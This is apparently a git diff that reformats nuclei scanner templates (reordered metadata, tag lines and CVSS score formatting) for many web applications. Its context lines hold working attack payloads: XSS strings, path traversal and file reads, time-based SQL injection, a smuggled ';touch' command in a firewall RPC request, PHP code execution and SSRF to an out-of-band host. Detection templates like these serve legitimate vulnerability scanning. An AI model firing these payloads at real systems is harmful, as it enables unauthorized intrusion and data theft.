dhiyaneshDk - description: PMB 5.6 is vulnerable to local file inclusion. severity: high + description: PMB 5.6 is vulnerable to local file inclusion. reference: - https://www.exploit-db.com/exploits/49054 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,pmb,edb metadata: max-request: 1 + tags: lfi,pmb,edb http: - method: GET @@ -29,4 +29,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/other/pmb-xss.yaml b/http/vulnerabilities/other/pmb-xss.yaml index 1294ed4a6b..7de3d5c70e 100644 --- a/http/vulnerabilities/other/pmb-xss.yaml +++ b/http/vulnerabilities/other/pmb-xss.yaml @@ -13,8 +13,8 @@ info: cvss-score: 5.4 cwe-id: CWE-80 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:1469328760 tags: xss,pmb,cms diff --git a/http/vulnerabilities/other/pollbot-redirect.yaml b/http/vulnerabilities/other/pollbot-redirect.yaml index ac4981632e..2411679a34 100644 --- a/http/vulnerabilities/other/pollbot-redirect.yaml +++ b/http/vulnerabilities/other/pollbot-redirect.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: redirect,mozilla,pollbot metadata: max-request: 1 + tags: redirect,mozilla,pollbot http: - method: GET diff --git a/http/vulnerabilities/other/powercreator-cms-rce.yaml b/http/vulnerabilities/other/powercreator-cms-rce.yaml index 2762c69205..982ea103d8 100644 --- a/http/vulnerabilities/other/powercreator-cms-rce.yaml +++ b/http/vulnerabilities/other/powercreator-cms-rce.yaml @@ -10,11 +10,11 @@ info: - https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/PowerCreatorCms/PowerCreatorCms%E4%BB%BB%E6%84%8F%E4%B8%8A%E4%BC%A0/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: rce,powercreator,intrusive,fileupload metadata: max-request: 2 + tags: rce,powercreator,intrusive,fileupload http: - raw: @@ -30,7 +30,6 @@ http: {{randstr}} -----------------------------20873900192357278038549710136-- - - | GET /ResourcePic/{{endpoint}} HTTP/1.1 Host: {{Hostname}} @@ -42,7 +41,6 @@ http: part: body regex: - "(.*?.ASPX)" - req-condition: true matchers: - type: dsl diff --git a/http/vulnerabilities/other/processmaker-lfi.yaml b/http/vulnerabilities/other/processmaker-lfi.yaml index 6f65cc46cd..0c1b5ed4aa 100644 --- a/http/vulnerabilities/other/processmaker-lfi.yaml +++ b/http/vulnerabilities/other/processmaker-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: processmaker,lfi,edb metadata: max-request: 1 + tags: processmaker,lfi,edb http: - raw: @@ -24,7 +24,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/vulnerabilities/other/pyspider-unauthorized-access.yaml b/http/vulnerabilities/other/pyspider-unauthorized-access.yaml index be775da2df..94cb68476c 100644 --- a/http/vulnerabilities/other/pyspider-unauthorized-access.yaml +++ b/http/vulnerabilities/other/pyspider-unauthorized-access.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/ianxtianxt/Pyspider-webui-poc - tags: pyspider,unauth metadata: max-request: 1 + tags: pyspider,unauth http: - raw: @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/qcubed-xss.yaml b/http/vulnerabilities/other/qcubed-xss.yaml index 057e20e1c8..81f7b67189 100644 --- a/http/vulnerabilities/other/qcubed-xss.yaml +++ b/http/vulnerabilities/other/qcubed-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,qcubed metadata: max-request: 2 + tags: xss,qcubed http: - method: GET @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml b/http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml index c7306560db..51d3f2cad4 100644 --- a/http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml +++ b/http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml @@ -10,11 +10,11 @@ info: - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: rce,firewall,intrusive metadata: max-request: 2 + tags: rce,firewall,intrusive http: - raw: @@ -23,7 +23,6 @@ http: Host: {{Hostname}} {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;touch /var/www/html/{{randstr}}.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="} - - | GET /{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/other/qihang-media-disclosure.yaml b/http/vulnerabilities/other/qihang-media-disclosure.yaml index da7380888b..6a7a3a6c53 100644 --- a/http/vulnerabilities/other/qihang-media-disclosure.yaml +++ b/http/vulnerabilities/other/qihang-media-disclosure.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: qihang,exposure metadata: max-request: 1 + tags: qihang,exposure http: - method: GET diff --git a/http/vulnerabilities/other/qihang-media-lfi.yaml b/http/vulnerabilities/other/qihang-media-lfi.yaml index c7428a602b..7a21e974e5 100644 --- a/http/vulnerabilities/other/qihang-media-lfi.yaml +++ b/http/vulnerabilities/other/qihang-media-lfi.yaml @@ -4,17 +4,16 @@ info: name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Arbitrary File Disclosure author: gy741 severity: high - description: The QiHang Media Web application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when - using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources. + description: The QiHang Media Web application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: qihang,lfi,disclosure metadata: max-request: 1 + tags: qihang,lfi,disclosure http: - raw: diff --git a/http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml b/http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml index 0ff20a34e8..a0ed9aa9d8 100644 --- a/http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml +++ b/http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw - tags: qizhi,fortressaircraft,unauth metadata: max-request: 1 + tags: qizhi,fortressaircraft,unauth http: - method: GET diff --git a/http/vulnerabilities/other/rconfig-file-upload.yaml b/http/vulnerabilities/other/rconfig-file-upload.yaml index b3635e1d8a..d99437b5f7 100644 --- a/http/vulnerabilities/other/rconfig-file-upload.yaml +++ b/http/vulnerabilities/other/rconfig-file-upload.yaml @@ -14,10 +14,10 @@ info: cvss-score: 8.8 cwe-id: CWE-434 metadata: + verified: true max-request: 1 shodan-query: title:"rConfig" - verified: true - tags: rconfig,rce,edb,file-upload,instrusive + tags: rconfig,rce,edb,file-upload,instrusive,intrusive http: - raw: @@ -63,8 +63,8 @@ http: - type: word words: - "User {{randstr}} successfully added to Database" - part: body + - type: status status: - 302 diff --git a/http/vulnerabilities/other/reddittop-rss-xss.yaml b/http/vulnerabilities/other/reddittop-rss-xss.yaml index f030634f99..021907e141 100644 --- a/http/vulnerabilities/other/reddittop-rss-xss.yaml +++ b/http/vulnerabilities/other/reddittop-rss-xss.yaml @@ -13,8 +13,8 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 verified: true + max-request: 1 tags: reddit,rss,xss http: diff --git a/http/vulnerabilities/other/resin-cnnvd-200705-315.yaml b/http/vulnerabilities/other/resin-cnnvd-200705-315.yaml index 903e88e269..e4784f6217 100644 --- a/http/vulnerabilities/other/resin-cnnvd-200705-315.yaml +++ b/http/vulnerabilities/other/resin-cnnvd-200705-315.yaml @@ -6,14 +6,15 @@ info: severity: high reference: - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315 - tags: resin,caucho,lfr metadata: max-request: 1 + tags: resin,caucho,lfr http: - method: GET path: - "{{BaseURL}}/%20../web-inf/" + matchers-condition: and matchers: - type: status diff --git a/http/vulnerabilities/other/resin-inputfile-fileread.yaml b/http/vulnerabilities/other/resin-inputfile-fileread.yaml index 98253c0f72..1659efd969 100644 --- a/http/vulnerabilities/other/resin-inputfile-fileread.yaml +++ b/http/vulnerabilities/other/resin-inputfile-fileread.yaml @@ -7,19 +7,21 @@ info: description: A vulnerability in Caucho Resin allows remote unauthenticated users to utilize the 'inputFile' variable to include the content of locally stored files and disclose their content. reference: - https://blkstone.github.io/2017/10/30/resin-attack-vectors/ - tags: resin,caucho,lfr metadata: max-request: 1 + tags: resin,caucho,lfr http: - method: GET path: - "{{BaseURL}}/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %" diff --git a/http/vulnerabilities/other/resin-viewfile-lfr.yaml b/http/vulnerabilities/other/resin-viewfile-lfr.yaml index 5a0594e40c..ee8e7b0f66 100644 --- a/http/vulnerabilities/other/resin-viewfile-lfr.yaml +++ b/http/vulnerabilities/other/resin-viewfile-lfr.yaml @@ -4,19 +4,19 @@ info: name: Caucho Resin LFR author: princechaddha severity: high - description: There is an input verification vulnerability in the implementation of a certain CGI program in Resin. A remote attacker may use this vulnerability to read any files in the home directory of the Web, - including JSP source code or class files. + description: There is an input verification vulnerability in the implementation of a certain CGI program in Resin. A remote attacker may use this vulnerability to read any files in the home directory of the Web, including JSP source code or class files. reference: - http://0day5.com/archives/1173/ - https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205 - tags: resin,caucho,lfr metadata: max-request: 1 + tags: resin,caucho,lfr http: - method: GET path: - "{{BaseURL}}/resin-doc/viewfile/?file=index.jsp" + matchers-condition: and matchers: - type: status diff --git a/http/vulnerabilities/other/rockmongo-xss.yaml b/http/vulnerabilities/other/rockmongo-xss.yaml index 6131f52d5c..851b95cbf5 100644 --- a/http/vulnerabilities/other/rockmongo-xss.yaml +++ b/http/vulnerabilities/other/rockmongo-xss.yaml @@ -11,21 +11,22 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: rockmongo,xss,packetstorm metadata: max-request: 1 + tags: rockmongo,xss,packetstorm http: - method: POST path: - "{{BaseURL}}/index.php?action=login.index" + headers: Content-Type: application/x-www-form-urlencoded + body: "more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3" matchers-condition: and matchers: - - type: word words: - '">' diff --git a/http/vulnerabilities/other/rundeck-log4j.yaml b/http/vulnerabilities/other/rundeck-log4j.yaml index 9a1fc5bb7a..4aa56ca802 100644 --- a/http/vulnerabilities/other/rundeck-log4j.yaml +++ b/http/vulnerabilities/other/rundeck-log4j.yaml @@ -15,9 +15,9 @@ info: cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: + verified: true max-request: 1 shodan-query: title:"Rundeck" - verified: true tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/sangfor-cphp-rce.yaml b/http/vulnerabilities/other/sangfor-cphp-rce.yaml index 82bbf2c6cc..8eb7ca1d96 100644 --- a/http/vulnerabilities/other/sangfor-cphp-rce.yaml +++ b/http/vulnerabilities/other/sangfor-cphp-rce.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E6%97%A5%E5%BF%97%E4%B8%AD%E5%BF%83%20c.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?plain=1 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: "isHighPerformance : !!SFIsHighPerformance" tags: sangfor,rce diff --git a/http/vulnerabilities/other/sangfor-download-lfi.yaml b/http/vulnerabilities/other/sangfor-download-lfi.yaml index cd7109ea4a..09abb27647 100644 --- a/http/vulnerabilities/other/sangfor-download-lfi.yaml +++ b/http/vulnerabilities/other/sangfor-download-lfi.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E6%8A%A5%E8%A1%A8%E7%B3%BB%E7%BB%9F%20download.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md?plain=1 metadata: + verified: true max-request: 1 fofa-query: app="SANGFOR-应用交付报表系统" - verified: true tags: lfi,sangfor http: diff --git a/http/vulnerabilities/other/sanhui-smg-file-read.yaml b/http/vulnerabilities/other/sanhui-smg-file-read.yaml index 12a7a888f8..c9c09ba1f6 100755 --- a/http/vulnerabilities/other/sanhui-smg-file-read.yaml +++ b/http/vulnerabilities/other/sanhui-smg-file-read.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E4%B8%89%E6%B1%87SMG%20%E7%BD%91%E5%85%B3%E7%AE%A1%E7%90%86%E8%BD%AF%E4%BB%B6%20down.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: body="text ml10 mr20" && title="网关管理软件" - tags: sanhui-smg,lfi,gateway + tags: sanhui-smg,lfi,gateway,intrusive http: - raw: diff --git a/http/vulnerabilities/other/sap-redirect.yaml b/http/vulnerabilities/other/sap-redirect.yaml index 99d07cb46a..31ce99c8d2 100644 --- a/http/vulnerabilities/other/sap-redirect.yaml +++ b/http/vulnerabilities/other/sap-redirect.yaml @@ -9,19 +9,17 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: redirect,sap metadata: max-request: 1 + tags: redirect,sap http: - method: GET - path: - "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://interact.sh" matchers-condition: and matchers: - - type: status status: - 302 diff --git a/http/vulnerabilities/other/sar2html-rce.yaml b/http/vulnerabilities/other/sar2html-rce.yaml index db21c04343..7970f58943 100644 --- a/http/vulnerabilities/other/sar2html-rce.yaml +++ b/http/vulnerabilities/other/sar2html-rce.yaml @@ -10,11 +10,11 @@ info: - https://www.exploit-db.com/exploits/49344 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: sar2html,rce,oast,edb metadata: max-request: 1 + tags: sar2html,rce,oast,edb http: - raw: diff --git a/http/vulnerabilities/other/seacms-rce.yaml b/http/vulnerabilities/other/seacms-rce.yaml index 4fc6afde45..919dfd9e24 100644 --- a/http/vulnerabilities/other/seacms-rce.yaml +++ b/http/vulnerabilities/other/seacms-rce.yaml @@ -7,14 +7,15 @@ info: description: A vulnerability in SeaCMS allows remote unauthenticated attackers to execute arbitrary PHP code. reference: - https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/ - tags: seacms,rce metadata: max-request: 1 + tags: seacms,rce http: - method: POST path: - '{{BaseURL}}/search.php?searchtype=5' + body: "searchtype=5&order=}{end if} {if:1)echo md5('seacms');if(1}{end if}" matchers-condition: and diff --git a/http/vulnerabilities/other/seacms-sqli.yaml b/http/vulnerabilities/other/seacms-sqli.yaml index 3adce6cf1d..ec7e14757c 100644 --- a/http/vulnerabilities/other/seacms-sqli.yaml +++ b/http/vulnerabilities/other/seacms-sqli.yaml @@ -9,12 +9,11 @@ info: - https://www.uedbox.com/post/54561/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 - tags: seacms,sqli metadata: max-request: 1 - + tags: seacms,sqli variables: num: "999999999" @@ -25,6 +24,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/seeyon-oa-log4j.yaml b/http/vulnerabilities/other/seeyon-oa-log4j.yaml index 15ac089be3..ee37856c83 100755 --- a/http/vulnerabilities/other/seeyon-oa-log4j.yaml +++ b/http/vulnerabilities/other/seeyon-oa-log4j.yaml @@ -16,8 +16,8 @@ info: cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="致远互联-OA" tags: cve,cve2021,rce,jndi,log4j,seeyon-oa,kev,oast @@ -37,4 +37,4 @@ http: - "status_code == 302" - 'contains(interactsh_protocol, "dns")' - "contains(tolower(header), '/seeyon/main.do')" - condition: and \ No newline at end of file + condition: and diff --git a/http/vulnerabilities/other/seowon-router-rce.yaml b/http/vulnerabilities/other/seowon-router-rce.yaml index d27698bb7e..cd124da51f 100644 --- a/http/vulnerabilities/other/seowon-router-rce.yaml +++ b/http/vulnerabilities/other/seowon-router-rce.yaml @@ -10,11 +10,11 @@ info: - https://www.exploit-db.com/exploits/50295 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: unauth,iot,edb,rce,seowon,router metadata: max-request: 1 + tags: unauth,iot,edb,rce,seowon,router http: - raw: diff --git a/http/vulnerabilities/other/servicenow-helpdesk-credential.yaml b/http/vulnerabilities/other/servicenow-helpdesk-credential.yaml index 6b3b701993..8eeffca447 100644 --- a/http/vulnerabilities/other/servicenow-helpdesk-credential.yaml +++ b/http/vulnerabilities/other/servicenow-helpdesk-credential.yaml @@ -7,9 +7,9 @@ info: description: Detection of exposed credentials in help the help desk JS file. reference: - https://jordanpotti.com/2021/02/21/ServiceNow-HelpTheHelpDeskAndTheHackers/ - tags: servicenow,exposure metadata: max-request: 1 + tags: servicenow,exposure http: - method: GET @@ -18,6 +18,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -32,4 +33,4 @@ http: - type: regex group: 1 regex: - - 'var server = "([a-z:/0-9.-]+)"' \ No newline at end of file + - 'var server = "([a-z:/0-9.-]+)"' diff --git a/http/vulnerabilities/other/sick-beard-xss.yaml b/http/vulnerabilities/other/sick-beard-xss.yaml index e7e653f01c..fc4efec1ad 100644 --- a/http/vulnerabilities/other/sick-beard-xss.yaml +++ b/http/vulnerabilities/other/sick-beard-xss.yaml @@ -21,15 +21,18 @@ http: - method: GET path: - "{{BaseURL}}/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - part: body + - type: word words: - "text/html" diff --git a/http/vulnerabilities/other/sitemap-sql-injection.yaml b/http/vulnerabilities/other/sitemap-sql-injection.yaml index 19bd5556b7..8683f56a72 100644 --- a/http/vulnerabilities/other/sitemap-sql-injection.yaml +++ b/http/vulnerabilities/other/sitemap-sql-injection.yaml @@ -6,8 +6,8 @@ info: severity: high reference: https://twitter.com/GodfatherOrwa/status/1647406811216072705?t=fbn0Eu34euKdrn4fL8UqfQ&s=19 metadata: - google-query: intext:"sitemap" filetype:txt, filetype:xml inurl:sitemap max-request: 2 + google-query: intext:"sitemap" filetype:txt, filetype:xml inurl:sitemap tags: misconfig,sitemap,sqli http: @@ -16,7 +16,6 @@ http: @timeout: 15s POST /sitemap.xml?offset=1;SELECT%20IF((SLEEP(6)),1,2356)# HTTP/1.1 Host: {{Hostname}} - - | @timeout: 25s POST /sitemap.xml?offset=1;SELECT%20IF((SLEEP(16)),1,2356)# HTTP/1.1 diff --git a/http/vulnerabilities/other/siteminder-dom-xss.yaml b/http/vulnerabilities/other/siteminder-dom-xss.yaml index ddafd1241b..3f842fa4bd 100644 --- a/http/vulnerabilities/other/siteminder-dom-xss.yaml +++ b/http/vulnerabilities/other/siteminder-dom-xss.yaml @@ -13,8 +13,8 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 2 verified: true + max-request: 2 google-query: inurl:"smpwservices.fcc" tags: dom,xss,siteminder @@ -25,9 +25,9 @@ http: - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7' stop-at-first-match: true + matchers-condition: and matchers: - - type: word words: - '\u003d\u0022confirm(document.domain)\u0022\u003e you cannot access your' diff --git a/http/vulnerabilities/other/skype-blind-ssrf.yaml b/http/vulnerabilities/other/skype-blind-ssrf.yaml index dd51697062..2077181d2c 100644 --- a/http/vulnerabilities/other/skype-blind-ssrf.yaml +++ b/http/vulnerabilities/other/skype-blind-ssrf.yaml @@ -9,11 +9,10 @@ info: reference: - https://frycos.github.io/vulns4free/2022/09/26/skype-audit-part2.html metadata: - shodan-query: html:"Skype for Business" verified: true max-request: 1 + shodan-query: html:"Skype for Business" tags: skype,blind-ssrf,oast,ssrf - variables: ssrfpayload: "http://{{interactsh-url}}/?id={{rand_base(3)}}%25{1337*1337}#.xx//" diff --git a/http/vulnerabilities/other/slims-xss.yaml b/http/vulnerabilities/other/slims-xss.yaml index a20f3317c2..1fba75668f 100644 --- a/http/vulnerabilities/other/slims-xss.yaml +++ b/http/vulnerabilities/other/slims-xss.yaml @@ -9,8 +9,8 @@ info: reference: - https://packetstormsecurity.com/files/170182/Senayan-Library-Management-System-9.4.0-Cross-Site-Scripting.html metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"SLIMS" tags: senayan,packetstorm,xss,slims diff --git a/http/vulnerabilities/other/solar-log-authbypass.yaml b/http/vulnerabilities/other/solar-log-authbypass.yaml index 4d84469c0d..2b67ebdf4d 100644 --- a/http/vulnerabilities/other/solar-log-authbypass.yaml +++ b/http/vulnerabilities/other/solar-log-authbypass.yaml @@ -4,15 +4,14 @@ info: name: Solar-Log 500 2.8.2 - Incorrect Access Control author: geeknik severity: high - description: Solar-Log 500 2.8.2 is susceptible to incorrect access control because the web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows - arbitrary remote attackers gain administrative privileges by connecting to the server. + description: Solar-Log 500 2.8.2 is susceptible to incorrect access control because the web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server. reference: - https://www.exploit-db.com/exploits/49986 classification: cwe-id: CWE-284 - tags: solarlog,auth-bypass,edb metadata: max-request: 1 + tags: solarlog,auth-bypass,edb http: - method: GET diff --git a/http/vulnerabilities/other/solarview-compact-xss.yaml b/http/vulnerabilities/other/solarview-compact-xss.yaml index 3cc536f9fc..90b137b935 100644 --- a/http/vulnerabilities/other/solarview-compact-xss.yaml +++ b/http/vulnerabilities/other/solarview-compact-xss.yaml @@ -13,8 +13,8 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"SolarView Compact" tags: xss,solarview,edb diff --git a/http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml b/http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml index 9223544850..2bebb56776 100644 --- a/http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml +++ b/http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml @@ -11,11 +11,11 @@ info: - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: shellshock,sonicwall,rce,vpn metadata: max-request: 1 + tags: shellshock,sonicwall,rce,vpn http: - raw: diff --git a/http/vulnerabilities/other/sound4-file-disclosure.yaml b/http/vulnerabilities/other/sound4-file-disclosure.yaml index 24e24f94ea..9466c1c722 100644 --- a/http/vulnerabilities/other/sound4-file-disclosure.yaml +++ b/http/vulnerabilities/other/sound4-file-disclosure.yaml @@ -10,9 +10,9 @@ info: - https://packetstormsecurity.com/files/170263/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Unauthenticated-File-Disclosure.html - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5736.php metadata: + verified: true max-request: 1 shodan-query: http.html:"SOUND4" - verified: true tags: packetstorm,lfi,sound4,unauth,disclosure http: diff --git a/http/vulnerabilities/other/spark-webui-unauth.yaml b/http/vulnerabilities/other/spark-webui-unauth.yaml index 16c9689092..8c7fa4f83c 100644 --- a/http/vulnerabilities/other/spark-webui-unauth.yaml +++ b/http/vulnerabilities/other/spark-webui-unauth.yaml @@ -6,9 +6,9 @@ info: severity: medium reference: - https://github.com/vulhub/vulhub/tree/master/spark/unacc - tags: unauth,vulhub,spark metadata: max-request: 1 + tags: unauth,vulhub,spark http: - method: GET @@ -20,6 +20,7 @@ http: - type: status status: - 200 + - type: word words: - "Spark Master at spark://" diff --git a/http/vulnerabilities/other/sponip-network-system-ping-rce.yaml b/http/vulnerabilities/other/sponip-network-system-ping-rce.yaml index 877fff5038..7476e05432 100644 --- a/http/vulnerabilities/other/sponip-network-system-ping-rce.yaml +++ b/http/vulnerabilities/other/sponip-network-system-ping-rce.yaml @@ -10,11 +10,11 @@ info: - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: sponip,rce,oast metadata: max-request: 1 + tags: sponip,rce,oast http: - raw: @@ -36,4 +36,4 @@ http: - type: word part: interactsh_request words: - - "User-Agent: curl" \ No newline at end of file + - "User-Agent: curl" diff --git a/http/vulnerabilities/other/steve-xss.yaml b/http/vulnerabilities/other/steve-xss.yaml index 8b2e09f700..eb3ffdbb7c 100644 --- a/http/vulnerabilities/other/steve-xss.yaml +++ b/http/vulnerabilities/other/steve-xss.yaml @@ -13,8 +13,8 @@ info: cvss-score: 5.4 cwe-id: CWE-80 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"SteVe - Steckdosenverwaltung" google-query: intitle:"SteVe - Steckdosenverwaltung" tags: steve,xss,oss @@ -26,6 +26,7 @@ http: - '{{BaseURL}}/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/surrealtodo-lfi.yaml b/http/vulnerabilities/other/surrealtodo-lfi.yaml index 04a7a569b0..5cf1f5f650 100644 --- a/http/vulnerabilities/other/surrealtodo-lfi.yaml +++ b/http/vulnerabilities/other/surrealtodo-lfi.yaml @@ -13,8 +13,8 @@ info: cvss-score: 7.5 cwe-id: CWE-22 metadata: - max-request: 1 verified: true + max-request: 1 tags: surreal,lfi,edb http: diff --git a/http/vulnerabilities/other/symantec-messaging-gateway.yaml b/http/vulnerabilities/other/symantec-messaging-gateway.yaml index 89e3be533e..0f540ecbc4 100644 --- a/http/vulnerabilities/other/symantec-messaging-gateway.yaml +++ b/http/vulnerabilities/other/symantec-messaging-gateway.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,messaging,symantec metadata: max-request: 1 + tags: lfi,messaging,symantec http: - method: GET diff --git a/http/vulnerabilities/other/tamronos-rce.yaml 